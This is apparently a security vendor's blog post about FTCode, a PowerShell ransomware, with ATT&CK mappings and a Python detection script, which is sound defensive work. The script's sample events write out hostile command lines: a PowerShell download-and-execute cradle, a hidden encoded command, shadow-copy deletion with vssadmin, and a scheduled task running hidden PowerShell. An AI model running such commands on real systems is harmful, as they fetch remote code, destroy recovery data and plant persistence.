Detection Content: FTCode Ransomware

Today, we want to draw your attention to another ransomware campaign targeting Italian-speaking users. First spotted by researchers back in 2013, FTCode is PowerShell-based ransomware distributed via spam.

In the recent attacks, FTCode was delivered to victim machines by an email with an attachment posing as an invoice, application form, or similar document that carries either a macro or a VBS script file. The victim usually opens the door for the malicious script by enabling the macros or by running the attached script. The script launches PowerShell, which downloads FTCode. After receiving a command from its C&C server, the ransomware not only encrypts the system but also steals sensitive user data such as login credentials and sends them to the server.

The detection content recently published by Threat Bounty Program member Emir Erdogan spots FTCode ransomware activity:

https://tdm.socprime.com/tdm/info/Q7oowPwEYKFt/vfYoyHMBQAH5UgbBiUJ3/

The rule has translations for the following platforms:

SIEM: ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, LogPoint, Humio

EDR: Carbon Black, Elastic Endpoint

MITRE ATT&CK: 

Tactics: Impact, Execution, Persistence, Privilege Escalation

Techniques: Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490), PowerShell (T1086, since re-numbered as T1059.001), Scheduled Task (T1053)
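To make the execution chain described above and the techniques listed here concrete, the following is an added illustration of the kind of process-creation checks a detection engineer would write for it. It is not the Threat Bounty rule linked above and not code from SOC Prime; the event records are constructed in Sysmon Event ID 1 style, and the parent-process list, the download-cradle pattern, and the host names and paths are assumptions chosen for the example. Each check maps to one of the ATT&CK techniques above: an Office application or script host spawning PowerShell, a PowerShell download cradle or encoded command (T1086), shadow-copy deletion (T1490), and a scheduled task that runs PowerShell (T1053).

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style). Not real telemetry;
# the last event is a benign admin script included to show that it does not alert.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/p')\""},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoP -W Hidden -Enc SQBFAFgA"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /create /tn WindowsUpdateCheck "
                "/tr \"powershell -w hidden -f C:\\Users\\Public\\x.ps1\" /sc daily"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

# Assumed list of parents that should rarely spawn PowerShell directly:
# Office applications (macro execution) and the Windows script hosts (VBS/JS attachments).
SCRIPT_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "cscript.exe")

# Assumed download-cradle / encoded-command indicators on the PowerShell command line.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|-enc(odedcommand)?\b",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of technique labels an event matches (empty if it looks benign)."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    hits = []
    if image == "powershell.exe" and parent in SCRIPT_PARENTS:
        hits.append("T1086 PowerShell spawned by Office application or script host")
    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
        hits.append("T1086 PowerShell download cradle or encoded command")
    if image == "vssadmin.exe" and re.search(r"delete\s+shadows", cmd, re.IGNORECASE):
        hits.append("T1490 shadow copy deletion")
    if image == "schtasks.exe" and re.search(r"/create", cmd, re.IGNORECASE) \
            and re.search(r"powershell", cmd, re.IGNORECASE):
        hits.append("T1053 scheduled task that runs PowerShell")
    return hits


def scan(events):
    """Run every check over every event; return (event index, label) pairs."""
    return [(i, label) for i, ev in enumerate(events) for label in classify(ev)]


if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label}")
```

Two of the constructed events fire twice (a suspicious parent plus a download cradle on the same command line), which is the kind of stacking that raises confidence in a FTCode-style alert; the benign `-File` invocation from Explorer fires nothing. In a real SIEM or EDR rule the same logic would be expressed in the platform's query language, and the parent list and cradle pattern would be tuned against the environment's own baseline.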


Ready to try out SOC Prime TDM? Sign up for free.

Or join Threat Bounty Program to craft your own content and share it with the TDM community.